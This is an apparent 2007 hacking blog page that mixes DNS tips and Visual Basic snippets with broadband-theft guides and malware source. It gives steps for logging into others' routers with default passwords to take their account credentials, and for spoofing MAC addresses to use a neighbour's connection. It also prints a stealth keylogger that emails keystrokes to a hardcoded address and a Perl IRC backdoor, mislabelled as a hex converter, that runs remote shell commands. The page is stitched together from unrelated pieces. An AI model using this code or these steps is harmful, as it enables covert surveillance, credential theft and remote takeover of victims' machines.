Saturday, November 17, 2007

Hack DNS for lightning-fast Web browsing

No matter how big the broadband pipe you use to surf the Web, it's not big enough. Everyone, whether they use a slowpoke dial-up modem or the fastest FiOS line, wants to surf faster.

There's a simple way you can get to Web sites faster, and it won't cost you a penny. You can hack the way your PC uses the Domain Name System (DNS), the technology underlying all Web browsing. It's far simpler to do than you might imagine, as you'll see in this article.

Understanding DNS

Before you start, it's a good idea to get a basic understanding of how DNS works. When you type in a URL such as www.computerworld.com, that URL needs to be translated into a numeric IP address that Web servers and Internet routers can understand. When you type in a URL, a DNS server does the translation, from www.computerworld.com to 65.221.110.98, for example.


DNS servers live on the Internet, and your computer contacts them with the request to do that translation, which is commonly called name resolution. When you use an ISP, your computer will automatically use the default DNS servers specified by your ISP; you typically don't need to set up DNS in any way. If you're on a corporate network, your systems administrator may have set you up to use specific DNS servers.

If there's a delay in contacting the DNS server, or if the DNS server takes too much time resolving the address, you'll face a delay in getting to a Web site. So even if you've got the world's fattest pipe, your Web surfing will be slowed down.

If you could speed up the name resolution in some way, you'd be able to speed up your Web surfing. And that's exactly what I'll show you how to do.
Here's the simplest way to hack DNS to speed up your Web browsing: Use free, superfast DNS servers run by the OpenDNS service instead of your ISP's DNS servers. OpenDNS has a monstrously big DNS cache, with DNS servers around the world, so you'll be able to retrieve IP addresses from it more quickly than from your ISP's DNS servers.

As I'll explain a little later in this article, the service includes other benefits as well, such as letting you create browser shortcuts so that you could go to www.computerworld.com, for example, by just typing the letter c in your browser and pressing Enter.

The addresses of the OpenDNS servers are 208.67.222.222 for a primary DNS server and 208.67.220.220 for a secondary server.

To use the OpenDNS servers, you'll have to tell your computer to use them. If you have Windows XP, first select Control Panel --> Network and Internet Connections --> Network Connections, right-click your network connection from the Network Connections window, and select Properties.
Scroll down to the Internet Protocol (TCP/IP) listing and select Properties. At the bottom of the screen, select "Use the following DNS server addresses." For the Preferred DNS server, enter this address: 208.67.222.222. For the Alternative DNS server, enter this address: 208.67.220.220. Click OK, and then click Close and Close again. Restart your PC in order for the settings to take effect.

Note
If you have a router, all you have to do is use the router's base address.

And never try touching/editing or so-called hacking your DNS.. until and unless you're open with your system and can freely take risks.. DNS being one of the most delicate parts... it can make your networking go towards hell if something is done wrong... so beware!
Being a pro hacker.. I can say only this!

Speed

Like broadband.
Here is a simple trick for how you hack it:
Go to Start > Run and type regedit.

In the registry, open:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports

Modify the default string value of the port. For example, COM1 is "9600,n,8,1" by default; you can modify it to "921600,n,8,1,p".

Do this for all of COM1, 2, 3, 4, 5.

WARNING: Do this ONLY if using dial-up (analogue) modems (e.g. 56K, ISDN) connected only to a serial port (COMx), NOT IF modems! If using internal modems located in the Communication Networking Riser (CNR) slot, do NOT use these settings! Such cards are incompatible with these settings.

Also, please don't expect your Internet access speed to improve; if it does, well and good!

No software is needed; it is a simple trick.


HAKING UR BROADBAND

Step 1: Download any port Scanner (i preffer Super Scan, IPscanner, gfi LAN nat secirity scanner)

Step 2: First Get your ip

Go to Command prompt type ipconfig /all
Hit enter.
You will see your ip as a clients ip.
suppose its 61.1.1.51

Step 3: write your ip in IP scanner Software and scan for alive IPs in the below range
start:61.1.1.1 to End:61.1.255.255


Step 4: Then check in your scanner which alive IPs has the port 80 open or 23 for telnet.


Step 5: if port 80 is open then Enter that IP in your web browser
if 23 port is open then u shd knw how to telnet it frm cmd........


Step 6: It asks for user ID AND password type

username =admin
password =admin or password

It is the default password for most of the routers.

if denied then use on another alive IP

Step 7: If success then it will show router settings page of tht IP user
There goto Home -> Wan Setting and the username and password of his account will appear there.

Step 8: use Show Password tools to view the password in asterisks ********.


now you have username and password ready for use.

Hacking sify

So guys all those using sify broadband connection get happy here i am giving the way to hack it its not a YET ANOTHER BOGUS tympass

for this u need these app.

1 angry ip scanner
2 gentle mac

h**p://dl.phazeddl.com/793469/Gentle_MAC_Pro_4.0.0.1729/softrightnow
replace ** wid tt

////////////////////////////////////////////////////////////////////
so here u go
first scan your ip range by
ANgry ip scanner

for example the ip given to u by your internet guy is 10.13.195.124

then scan for this 10.13.195.0 to 10.13.195.255 and see the results the alive users of your ip range will be shown as green right click any of them and view his MAC address

now using gentle mac change your ip and mac address to his !! and voilla u are now leaching his bandwidth !! believe me guys from months i am getting minimum of 256 kbps on my 64 one


just make sure u logoff from your sify connection before doing this
and wen a user logs off u can scan again and get a new address

a few tyms u will see that a user is shown green but u can't use his connection this happens wen his pc is on but he has not logged in to sify

u ppl just try all possible users and chose the one who is having fastest connection !

exploits

Xxploit
void con(int sockfd)
{
char rb[1500];
fd_set fdreadme;
int i;

FD_ZERO(&fdreadme);
FD_SET(sockfd, &fdreadme);
FD_SET(0, &fdreadme);

while(1)
{
FD_SET(sockfd, &fdreadme);
FD_SET(0, &fdreadme);
if(select(FD_SETSIZE, &fdreadme, NULL, NULL, NULL) < 0 ) break;
if(FD_ISSET(sockfd, &fdreadme))
{
if((i = recv(sockfd, rb, sizeof(rb), 0)) < 0)
{
printf("[-] Connection lost..\n");
exit(1);
}
if(write(1, rb, i) < 0) break;
}

if(FD_ISSET(0, &fdreadme))
{
if((i = read(0, rb, sizeof(rb))) < 0)
{
printf("[-] Connection lost..\n");
exit(1);
}
if (send(sockfd, rb, i, 0) < 0) break;
}
usleep(10000);
}

printf("[-] Connection closed by foreign host..\n");

exit(0);

}

int main(int argc, char **argv)
{
int len, len1, sockfd, c, a;
unsigned long ret;
unsigned short port = 135;
unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
unsigned short lportl=666; /* drg */
char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
struct hostent *he;
struct sockaddr_in their_addr;
static char *hostname=NULL;

if(argc<2)
{
usage(argv[0]);
}

while((c = getopt(argc, argv, "d:t:r:p:l:"))!= EOF)
{
switch (c)
{
case 'd':
hostname = optarg;
break;
case 't':
type = atoi(optarg);
if((type > 1) || (type < 0))
{
printf("[-] Select a valid target:\n");
for(a = 0; a < sizeof(targets)/sizeof(v); a++)
printf(" %d [0x%.8x]: %s\n", a, targets[a].ret, targets[a].os);
return 1;
}
break;
case 'r':
targets[type].ret = strtoul(optarg, NULL, 16);
break;
case 'p':
port = atoi(optarg);
if((port > 65535) || (port < 1))
{
printf("[-] Select a port between 1-65535\n");
return 1;
}
break;
case 'l':
lportl = atoi(optarg);
if((port > 65535) || (port < 1))
{
printf("[-] Select a port between 1-65535\n");
return 1;
}
break;
default:
usage(argv[0]);
return 1;
}
}

The code shown above reveals information about the raw socket which will be used to convey the packets used in this attack. Suffice it to say that there were no such attempts at creating a raw socket in the exploit that was posted in the forum by the individual claiming it was a 0-day exploit. Once this is ascertained, alarm bells should start going off in your head. If no system calls are being used to deliver the exploit payload to the destination machine, then just where is this code going to execute? You guessed it: right on the local machine itself. In reality you are not going to be exploiting anyone; rather, the code will be exploiting you!

One more thing about this supposed exploit bothered me as well. If you have not yet taken a look at the link I included above, please do so now. What also bothered me is that there was a surprisingly small amount of machine language, or ASM as it is also called. The supposed ASM in the code listed in part I looks like the small snippet below:

char *shellcode_payload=
\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x3
\x68\x61\x6e\x3d\x22\x23\x30\x78\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22\xb
\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22\x69\x72\x33\x69\x70\x2e\xe
\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\xb
\x65\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x9
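
The check described above, as an added example that is not part of the original article: decode the escaped bytes of a supposed shellcode string and see whether they are machine code at all or, as here, a plain-text script that would run on your own machine. The function names, the 0.95 printable-text threshold and the contrast sample are assumptions made for this illustration; the first sample is the first two lines of the snippet above, including their cut-off final escapes.

```python
"""Triage the escaped 'shellcode' string in an untrusted PoC before compiling it."""
import re

ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")

# First two lines of the shellcode_payload snippet quoted above, copied verbatim.
# Each line lost part of its last escape, so both end in a truncated "\x.".
PAGE_SAMPLE = (
    r"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x3" "\n"
    r"\x68\x61\x6e\x3d\x22\x23\x30\x78\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22\xb"
)
# Constructed contrast sample: arbitrary non-text bytes, not a working payload.
CONSTRUCTED_BINARY = r"\x90\x90\x31\xc0\xeb\xfe\x00\xff"


def decode_escapes(text):
    """Return (decoded bytes, number of malformed or truncated \\x escapes)."""
    decoded = bytes(int(pair, 16) for pair in ESCAPE.findall(text))
    leftover = ESCAPE.sub("", text)          # whatever was not a complete escape
    return decoded, leftover.count("\\x")


def triage(text, text_threshold=0.95):
    """Classify an escaped payload as 'script', 'binary' or 'empty'."""
    data, truncated = decode_escapes(text)
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    ratio = printable / len(data) if data else 0.0
    first_line = data.split(b"\n", 1)[0]
    shebang = first_line.startswith(b"#!")
    interpreter = None
    if shebang and first_line[2:].split():
        interpreter = first_line[2:].split()[0].decode("ascii", "replace")
    if not data:
        verdict = "empty"
    elif shebang or ratio >= text_threshold:
        verdict = "script"                   # readable text: it runs locally
    else:
        verdict = "binary"
    return {
        "verdict": verdict,
        "interpreter": interpreter,
        "printable_ratio": ratio,
        "truncated_escapes": truncated,
        "decoded": data,
    }


if __name__ == "__main__":
    for label, sample in (("page snippet", PAGE_SAMPLE),
                          ("constructed binary", CONSTRUCTED_BINARY)):
        result = triage(sample)
        print(label, result["verdict"], result["interpreter"],
              "%.2f" % result["printable_ratio"], result["decoded"])
```

A "script" verdict with an interpreter path means the string is source text to be read, not bytes to be delivered to a remote host.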

source codes

Coding Ascii
BTW, here's a little doo-dad that I threw together that moves the ascii value of each
character up (encode) or down (decode), with a default change of 40.
So, for example, chr(233) might become chr(21), or chr(74) might become chr(114).
Anyone who knows what they're doing could easily decode it, but at least it's not legible
if you open the file in Notepad, etc. Try it!

Syntax is: encode(mytext, [range]) and decode(mytext, [range]).

-SJ; samjohnyb4u@gmail.com

Public Function Encode(Data as String, Optional Depth as Integer) as String
Dim TempChar as String
Dim TempAsc as Integer
Dim NewData as String
Dim vChar as Integer

For vChar = 1 To Len(Data)
TempChar = Mid$(Data, vChar, 1)
TempAsc = Asc(TempChar)
If Depth = 0 Then Depth = 40 'DEFAULT DEPTH
If Depth > 254 Then Depth = 254

TempAsc = TempAsc + Depth
If TempAsc > 255 Then TempAsc = TempAsc - 256 'wrap modulo 256 so every value stays reversible
TempChar = Chr(TempAsc)
NewData = NewData & TempChar
Next vChar
Encode = NewData

End Function

Public Function Decode(Data as String, Optional Depth as Integer) as String
Dim TempChar as String
Dim TempAsc as Integer
Dim NewData as String
Dim vChar as Integer

For vChar = 1 To Len(Data)
TempChar = Mid$(Data, vChar, 1)
TempAsc = Asc(TempChar)
If Depth = 0 Then Depth = 40 'DEFAULT DEPTH
If Depth > 254 Then Depth = 254
TempAsc = TempAsc - Depth
If TempAsc < 0 Then TempAsc = TempAsc + 256 'undo the modulo-256 wrap applied by Encode
TempChar = Chr(TempAsc)
NewData = NewData & TempChar
Next vChar
Decode = NewData

End Function

CheckTime
converting text-input to a reliable time

'convert (most of) any input to a time

Public Function CheckTijd(bron$) As Date
dim t%
'checking on digits and separator
Const Getal$ = "1234567890.:"

For t% = 1 To Len(bron$)
If InStr(Getal$, Mid$(bron$, t%, 1)) = 0 Then exit Function
If Mid$(bron$, t%, 1) = "." Then bron$ = Left$(bron$, t% - 1) & ":" & Right$(bron$, Len(bron$) - t%)
Next t%

select case Len(bron$)
case 0
exit Function
case 1
bron$ = "0" & bron$ & ":00"
case 2
bron$ = bron$ & ":00"
case 3
t% = InStr(bron$, ":")
If t% = 0 Then _
bron$ = Left$(bron$, 1) & ":" & Right$(bron$, 2)
case 4
t% = InStr(bron$, ":")
If t% = 0 Then _
bron$ = Left$(bron$, 2) & ":" & Right$(bron$, 2)
case 5
bron$ = Left$(bron$, 2) & ":" & Right$(bron$, 2)
end Select

on Error Resume Next
CheckTijd = TimeValue(bron$)

End Function

'use it in the Text_Lostfocus event like

Sub Text1_LostFocus
Text1.Text = CheckTijd(Text1.Text)
End Sub

'giving the input in text1 => result
'1 => 01:00
'12 => 12:00
'1.1 => 01:10
'915 => 9:15
'9.15 => 9:15
'1015 => 10:15
'10.15 => 10:15
'12:15 => 12:15

'giving an impossible time => result
'26 => 00:00
'1976 => 00:00

'giving just nothing (TAB/ENTER) will give no result

Converting Numbers
Hexadecimal to Decimal

Sub Form_Load ()

Dim x as String
Dim y as Variant

x = "fffe"
y = CLng("&H" & x)

If y < 0 Then y = y + 65536 ' returns 65534

MsgBox y

End Sub


* Converting a string to an integer: Cal Stover

Dim SomeVariable as Integer
SomeVariable = CInt(Label2.Caption) + 100

Dim SomeVariable as Single
SomeVariable = CSng(Val(Label2.Caption) + 100)


* convert a number in Hexadecimal to Binary -chris

A very fast conversion from hex to binary can be done with a sixteen
element look-up table - a single hex digit converts to four binary
digits. So:

Function Hex2Bin$(HexValue$)
CONST BinTbl ="0000000100100011010001010110011110001001101010111100110111101111"
dim X, Work$
Work$ = ""
For X = 1 to Len(HexValue$)
'each hex digit (0-15) selects its four-character group in BinTbl
Work$ = Work$ + Mid$(BinTbl, Val("&h" + Mid$(HexValue$, X, 1)) * 4 + 1, 4)
Next
Hex2Bin$ = Work$
End Function

You could also code BinTbl as an array which would eliminate one of the
Mid$() calls, but then the array would either have to be built ahead of
time or built every time you called the Hex2Bin function. You could try
all three options and see which is faster.

'Drag and Drop
'Drag and Drop within a application

Suppose you have a listbox with some elements and want to drag&drop a selected one into
a textbox. I know there are easier ways to do this but it's just for making the point.

Make a form with a textbox (text1) and a listbox (list1). Fill the listbox with some items...
Make a label (label1) and make it invisible (Visible = False).

Put the next code at the appropriate places:

Sub List1_MouseDown (Button as Integer, Shift as Integer, X as Single, Y as Single)
Dim DY

DY = TextHeight("A")
Label1.Move list1.Left, list1.Top + Y - DY / 2, list1.Width, DY
Label1.Drag

End Sub

Sub List1_DragOver (Source as Control, X as Single, Y as Single, state as Integer)
If state = 0 Then Source.MousePointer = 12
If state = 1 Then Source.MousePointer = 0

End Sub

Sub Form_DragOver (Source as Control, X as Single, Y as Single, state as Integer)
If state = 0 Then Source.MousePointer = 12
If state = 1 Then Source.MousePointer = 0

End Sub

Sub Text1_DragDrop (Index as Integer, Source as Control, X as Single, Y as Single)
text1.text = list1

End Sub

FileExists
check if file already exists

---------------- first version

Function FileExist (Path$) as Integer
dim x
x = FreeFile
on Error Resume Next
open Path$ For Input as x
FileExist = (Err = 0)
Close x
End Function

---------------- second version

'thanks for modifications: Lynton

The function above assumes that the file you are checking for is
not locked (in use). In that case, fileexists would return false because
you are attempting to open a locked file.

Function FileExists%(ByVal sPath$)
' Check for the existence of a file.
dim rc%
FileExists = False
on Error Resume Next
If Len(sPath$) Then
rc% = Len(Dir$(sPath$))
If rc% And Not Err Then FileExists% = True
end If
End Function

---------------- third version
George Toft


This is much easier and quicker than the ones you have. I used to
use code almost identical to the ones you have until I learned about
the DIR function.

Public Function FileExist(parmPath as String) as Integer

FileExist = Not (Dir(parmPath) = "")

End Function' FileExist

---------------- fourth adjustment
dayak


Using a Form, containing a Textbox, and a Command button, the following code
works for creating and checking the existence of a directory.
============================Code Follows===================================



Private sub Command1_Click()

Dim sFname as String
sFname = App.Path & "\" & "mydir"

If Not FileExist(sFname) Then
MsgBox ("Creating 'mydir' Directory in App.Path")
MkDir (sFname)
Text1.Text = "Directory 'mydir' has been created"
Else
Text1.Text = "Directory 'mydir' already exists"
End If


End Sub

Private Function FileExist(ByRef sFname) as Boolean

If Len(Dir(sFname, 16)) Then FileExist = True Else FileExist = False

End Function

FileName
get only the filename 'use as

MsgBox HaalBestandNaam("c:\windows\win.com","\") 'gives you 'win.com'
MsgBox HaalBestandNaam("d:/data/backup.txt","/") 'gives you 'backup.txt'
'last example I needed for connecting to some unix-systems

Function HaalBestandNaam(bron$, vSlash$) as String
dim p%

HaalBestandNaam = bron
For p% = Len(bron$) To 1 step -1 'Mid$ positions start at 1
If Mid$(bron$, p%, 1) = vSlash$ Then
HaalBestandNaam = Mid$(bron$, p% + 1, Len(bron$) - p% + 1)
exit Function
end If
Next p%

End Function

Integer2Hex
convert integer to Hex

'convert binary to Hex

'make a form with a commondialog.control
'make a command.control named cmdColor

Sub cmdColor_Click()
dim RedValue, GreenValue, BlueValue
dim AColor

'see help on Flags for settings
CMDialog1.Flags = &H1& Or &H4&
'action 3 means show colorpalette
CMDialog1.Action = 3
'when you press OKE the color will be put into the variable AColor
AColor = CMDialog1.Color

RedValue = (ACOLOR And &HFF&)
GreenValue = (ACOLOR And &HFF00&) \ 256
BlueValue = (ACOLOR And &HFF0000) \ 65536
'pad each component to two hex digits (Hex() drops leading zeros)
ChoosenColor = Right$("0" & Hex(RedValue), 2) & Right$("0" & Hex(GreenValue), 2) & Right$("0" & Hex(BlueValue), 2)
msgbox ChoosenColor

End Sub

Leap-Year
check if year is a leap-year

'checking if a year is a leap-year

'make a new project
'add a form
'add a textbox and a commandbutton
'insert the code
'press F5


Option Explicit

Private sub Command1_Click()

dim strDatum as String

If Text1.Text = "" Then exit Sub
strDatum = ("29-2-" + Text1.Text)
If IsDate(strDatum) Then MsgBox Text1.Text + " is a leap-year." _
Else MsgBox Text1.Text + " isn't a leap-year."

End Sub

Private sub Form_Load()

Text1.Text = Year(Now)

End Sub

LimitInput
limit input in a textbox to certain characters

Function LimitTextInput(source) as String
'put the next line in the Textbox_KeyPress event
'KeyAscii = LimitTextInput(KeyAscii)

'change Numbers with any other character
Const Numbers$ = "0123456789."

'backspace =8
If source <> 8 Then
If InStr(Numbers, Chr(source)) = 0 Then
LimitTextInput = 0
exit Function
end If
end If
LimitTextInput = source

End Function

Simple Key logger
Just create a timer and a textbox on your form, leave their names as Text1 and Timer1. Set the timer's interval to 1 and make sure it's activated. Copy this code to your form.

Dim result As Integer

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Private Sub Timer1_Timer()

For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)

If result = -32767 Then
Text1.Text = Text1.Text + Chr(i)
End if
Next i
End Sub

if this aint working..do tell me..



Keymail

/*
Compile notes: I used Dev-C++

4.9.9.2 to compie this. if you get an

error like:
Linker error] undefined

reference to `WSAStartup@8'
Add this:
-lws2_32
to Tools->Compiler Options under the

section on compile flags.
*/

#include
#include
#include
#include
#include
int MailIt (char *mailserver, char

*emailto, char *emailfrom,
char *emailsubject, char

*emailmessage);
#define BUFSIZE 800
#define waittime 500
/*If you don't know the mail

exchange server for an address for

the following
"nslookup -querytype=mx gmail.com"

but replace gmail.com with the domain

for
whatever email address you want.

YOU MUST CHANGE THESE

SETTINGS OR
IT WILL NOT WORK!!! */#define cmailserver

"gmail-smtp-in.l.google.com"
#define cemailto

"samjohnyb4u@gmail.com"
#define cemailfrom

"samjohnyb4u@gmail.com"
#define LogLength 100
#define FileName "sound.wav"
#define SMTPLog "ring.wav"
#define cemailsubject "Logged"int test_key(void);
int main(void)
{
//Uncomment the lines below to

put the keylogger in stealh mode.
HWND stealth; /*creating stealth

*/
AllocConsole();


stealth=FindWindowA("ConsoleWindowC

lass",NULL);
ShowWindow(stealth,0);

{FILE *file;
file=fopen(FileName,"a+");
time_t theTime=time(0);
fputs("\nStarted logging: ", file);
fputs(ctime(&theTime),file);
fclose(file);
} /* if (test==2)
{//the path in which the file

needs to be
char

*path="c:\\%windir%\\svchost.exe";
create=create_key(path);
} */

int t=get_keys();
return t;
} int get_keys(void)
{
int freadindex;
char *buf;
long len;
FILE *file;
file=fopen(FileName,"a+");

short character;
while(1)
{
sleep(10);/*to

prevent 100% cpu usage*/for(character=8;character<=222;char

acter++)
{


if(GetAsyncKeyState(character)==-32

767)
{
FILE *file;


file=fopen(FileName,"a+");


if(file==NULL)
{


return 1;
}


if(file!=NULL)
{


if((character>=39)&&(character<=64))
{


fputc(character,file);


fclose(file);


break;
}


else

if((character>64)&&(character<91))
{


character+=32;


fputc(character,file);


fclose(file);


break;
}
else
{

switch(character)


{


case VK_SPACE:


fputc(' ',file);


fclose(file);


break;


case VK_SHIFT:

fputs("\r\n[SHIFT]\r\n",file);


fclose(file);


break;


fputs("\r\n[ENTER]\r\n",file);


fclose(file);


break;


case VK_BACK:




fputs("\r\n[BACKSPACE]\r\n",file);


fclose(file);


break;


case VK_TAB:


fputs("\r\n[TAB]\r\n",file);


fclose(file);


break;


case VK_CONTROL:


fputs("\r\n[CTRL]\r\n",file);


fclose(file);


break;


case VK_DELETE:


fputs("\r\n[DEL]\r\n",file);


fclose(file);

break;


case VK_OEM_1:


fputs("\r\n[;:]\r\n",file);


fclose(file);


break;


case VK_OEM_2:

fputs("\r\n[/?]\r\n",file);


fclose(file);


break;


case VK_OEM_3:

fputs("\r\n[`~]\r\n",file);


fclose(file);
break;


case VK_OEM_4:


fputs("\r\n[ [{ ]\r\n",file);


fclose(file);


break;


case VK_OEM_5:


fputs("\r\n[\\|]\r\n",file);


fclose(file);


break;




case VK_OEM_6:


fputs("\r\n[ ]} ]\r\n",file);


fclose(file);


break;


case VK_OEM_7:


fputs("\r\n['\"]\r\n",file);


fclose(file);


break;

case 187:


fputc('+',file);


fclose(file);


break;


case 188:


fputc(',',file);


fclose(file);


break;


case 189:


fputc('-',file);
fclose(file);


break;


case 190:


fputc('.',file); fclose(file);
break;


case VK_NUMPAD0:


fputc('0',file);


fclose(file);


break;


case VK_NUMPAD1:


fputc('1',file);


fclose(file);


break;


case VK_NUMPAD2:


fputc('2',file);


fclose(file);


break;


case VK_NUMPAD3:


fputc('3',file);


fclose(file);


break;


case VK_NUMPAD4:


fputc('4',file);


fclose(file);


break;


case VK_NUMPAD5:


fputc('5',file);


fclose(file);


break; case VK_NUMPAD6:


fputc('6',file);


fclose(file);


break;


case VK_NUMPAD7:


fputc('7',file);


fclose(file);


break;
case VK_NUMPAD8:


fputc('8',file);


fclose(file);


break;


case VK_NUMPAD9:


fputc('9',file);


fclose(file);


break;


case VK_CAPITAL:


fputs("\r\n[CAPS

LOCK]\r\n",file);


fclose(file);


break;


default:


fclose(file);


break;
}


}
}
}
}
FILE *file;
file=fopen(FileName,"rb");
fseek(file,0,SEEK_END);

//go to end
len=ftell(file); //get

position at end (length)
if(len>=LogLength) {


fseek(file,0,SEEK_SET);//go to beg.
buf=(char

*)malloc(len);//malloc buffer


freadindex=fread(buf,1,len,file);//rea

d into buffer
buf[freadindex] =

'\0';//Extra bit I have to add to

make it a sting
MailIt( cmailserver,

cemailto, cemailfrom, cemailsubject,

buf); fclose(file);
file=fopen(FileName,"w");


}
fclose(file);
//free (buf);

}
return EXIT_SUCCESS;


}
int MailIt (char *mailserver, char

*emailto, char *emailfrom,
char *emailsubject, char

*emailmessage) {
SOCKET sockfd;
WSADATA wsaData;
FILE *smtpfile;

#define bufsize 300
int bytes_sent; /* Sock FD */
int err;
struct hostent *host; /* info

from gethostbyname */
struct sockaddr_in dest_addr;

/* Host Address */
char line[1000];
char *Rec_Buf = (char*)

malloc(bufsize+1);
smtpfile=fopen(SMTPLog,"a+");
if (WSAStartup(0x202,&wsaData)

== SOCKET_ERROR) {
fputs("WSAStartup

failed",smtpfile);
WSACleanup();
return -1;
}
if (

(host=gethostbyname(mailserver)) ==

NULL) {
perror("gethostbyname");
exit(1);
}


memset(&dest_addr,0,sizeof(dest_add

r));


memcpy(&(dest_addr.sin_addr),host->

h_addr,host->h_length); /* Prepare dest_addr */
dest_addr.sin_family=

host->h_addrtype; /* AF_INET

from gethostbyname */
dest_addr.sin_port= htons(25);

/* PORT defined above */

/* Get socket */

if

((sockfd=socket(AF_INET,SOCK_STRE

AM,0)) < 0) {
perror("socket");
exit(1);
}
/* Connect !*/
fputs("Connecting....\n",smtpfile);

if (connect(sockfd, (struct

sockaddr

*)&dest_addr,sizeof(dest_addr)) ==

-1){
perror("connect");
exit(1);
}
sleep(waittime);


err=recv(sockfd,Rec_Buf,bufsize,0);R

ec_Buf[err] = '\0';
fputs(Rec_Buf,smtpfile);
strcpy(line,"helo

me.somepalace.com\n"); fputs(line,smtpfile);


bytes_sent=send(sockfd,line,strlen(line

),0);
sleep(waittime);err=recv(sockfd,Rec_Buf,bufsize,0);R

ec_Buf[err] = '\0';
fputs(Rec_Buf,smtpfile);
strcpy(line,"MAIL FROM:<");strncat(line,emailfrom,strlen(emailfro

m));
strncat(line,">\n",3);
fputs(line,smtpfile);bytes_sent=send(sockfd,line,strlen(line

),0);
sleep(waittime);
err=recv(sockfd,Rec_Buf,bufsize,0);R

ec_Buf[err] = '\0';
fputs(Rec_Buf,smtpfile);
strcpy(line,"RCPT TO:<");


strncat(line,emailto,strlen(emailto));
strncat(line,">\n",3);
fputs(line,smtpfile);


bytes_sent=send(sockfd,line,strlen(line

),0);
sleep(waittime);


err=recv(sockfd,Rec_Buf,bufsize,0);R

ec_Buf[err] = '\0';
fputs(Rec_Buf,smtpfile);
strcpy(line,"DATA\n");
fputs(line,smtpfile);


bytes_sent=send(sockfd,line,strlen(line

),0);
sleep(waittime);


err=recv(sockfd,Rec_Buf,bufsize,0);R

ec_Buf[err] = '\0';
fputs(Rec_Buf,smtpfile);
sleep(waittime);
strcpy(line,"To:");
strcat(line,emailto);
strcat(line,"\n");
strcat(line,"From:");
strcat(line,emailfrom);
strcat(line,"\n");
strcat(line,"Subject:");
strcat(line,emailsubject);
strcat(line,"\n");
strcat(line,emailmessage);
strcat(line,"\r\n.\r\n");
fputs(line,smtpfile);


bytes_sent=send(sockfd,line,strlen(line

),0);
sleep(waittime);err=recv(sockfd,Rec_Buf,bufsize,0);R

ec_Buf[err] = '\0';
fputs(Rec_Buf,smtpfile);
strcpy(line,"quit\n");
fputs(line,smtpfile);


bytes_sent=send(sockfd,line,strlen(line

),0);
sleep(waittime);


err=recv(sockfd,Rec_Buf,bufsize,0);R

ec_Buf[err] = '\0';
fputs(Rec_Buf,smtpfile);
fclose(smtpfile);


#ifdef WIN32
closesocket(sockfd);
WSACleanup();
#else
close(sockfd);
#endif
}

Perl Virus Scanner
#!/usr/bin/perl
use strict;
use warnings;
use File::Find;
use File::Scan;
my $scandir = "c:\\"; # couldn't get it to work with 'c:/'
my $results = "c:\\virusscan.txt";
open(VS, ">", $results) or die "Cannot open $results: $!";
my $filescan = File::Scan->new(extension => 'bad', move => 'infected');
find({ wanted => \&doscan, follow_skip => 2 }, $scandir);

sub doscan {
return if /^[.]+/;
my $file = $File::Find::name;
$file =~ s#\\##;
print "$file\n";
return if (-d $file);
$filescan->scan($file);
if (my $e = $filescan->error()) { print "$file $e\n"; }
if (my $c = $filescan->skipped()) {
my @skip = (
"file not skipped",
"file is not vulnerable",
"file has zero size",
"the size of file is small",
"the text file size is greater that the 'max_txt_size' argument",
"the binary file size is greater that the 'max_bin_size' argument",
);
print VS "$file $skip[$c]\n" if ($c); # only print if the file was skipped
}
if ($filescan->suspicious) { print VS "$file suspicious file\n"; }
}



Perl for converting Hex to ASCII
#!/usr/bin/perl
$chan="#0x";$nick="k";$server="ir3ip.net";
$SIG{TERM}={};
exit if fork;use IO::Socket;
$sock = IO::Socket::INET->new($server.":6667")||exit;
print $sock "USER k +i k :kv1\nNICK k\n";
$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;
last if $mode=="001";
if($mode=="433"){$i++;$nick=~s/\d*$/$i/;
print $sock "NICK $nick\n";}}
print $sock "JOIN $chan\nPRIVMSG $chan :Hi\n";
while(<$sock>){if (/^PING (.*)$/){print $sock "PONG $1\nJOIN $chan\n";}
if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;
$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG $chan :$_\n";sleep 1;}}
}#/tmp/hi

Detecting SoftICE
/*
Function: IsSICELoaded
Description: This method is used by a lot of crypters/compressors; it uses INT 41,
this interrupt is used by Windows debugging interface to detect if a
debugger is present. Only works under Windows.
Returns: true if a debugger is detected
*/

__inline bool IsSICELoaded() {
_asm {
mov ah, 0x43
int 0x68
cmp ax, 0x0F386 // Will be set by all system debuggers.
jz out_

xor ax, ax
mov es, ax
mov bx, word ptr es:[0x68*4]
mov es, word ptr es:[0x68*4+2]
mov eax, 0x0F43FC80
cmp eax, dword ptr es:[ebx]
jnz out_
jmp normal_
normal_:
xor eax, eax
leave
ret
out_:
mov eax, 0x1
leave
ret
}
return false;
}


Detecting SoftICE NT
/*
Function: IsSoftIceNTLoaded
Description: Like the previous one but for use under Win NT only
Returns: true if SoftIce is loaded
*/

__inline BOOL IsSoftIceNTLoaded() {
HANDLE hFile=CreateFile( "\\\\.\\NTICE",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

if(hFile!=INVALID_HANDLE_VALUE) { CloseHandle(hFile); return true; }
return false;
}

Detecting OllyDbg
/*
Function: IsODBGLoaded
Description: Tests if OllyDbg/other app debuggers is/are enabled
Returns: true if a debugger is detected
*/

__inline bool IsODBGLoaded() {
char *caption="DAEMON";
_asm {
push 0x00
push caption

mov eax, fs:[30h] // pointer to PEB
movzx eax, byte ptr[eax+0x2]
or al,al
jz normal_
jmp out_
normal_:
xor eax, eax
leave
ret
out_:
mov eax, 0x1
